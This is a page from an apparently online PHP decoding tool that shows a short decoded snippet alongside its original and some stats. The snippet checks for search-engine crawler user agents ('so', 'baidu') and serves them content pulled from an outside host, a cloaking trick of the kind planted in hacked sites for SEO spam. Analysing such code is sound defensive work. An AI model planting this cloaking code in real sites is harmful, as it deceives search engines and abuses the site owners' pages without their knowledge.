Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGENT"]..

Decoded Output download

<?php 
header('Content-Type:text/html;charset=gb2312'); 
$key= $_SERVER["HTTP_USER_AGENT"]; 
if(strpos($key,'so')!== false||strpos($key,'baidu')!==false) 
{ 
   $file = file_get_contents('http://w.comxj.com/');  
   echo $file;// 
} 
 
?>

Did this file decode correctly?

Original Code

<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'so')!== false||strpos($key,'baidu')!==false)
{
   $file = file_get_contents('http://w.comxj.com/'); 
   echo $file;//
}

?>

Function Calls

header 1

Variables

None

Stats

MD5 b95fcd58dac8ed555c79252e60fdd440
Eval Count 0
Decode Time 94 ms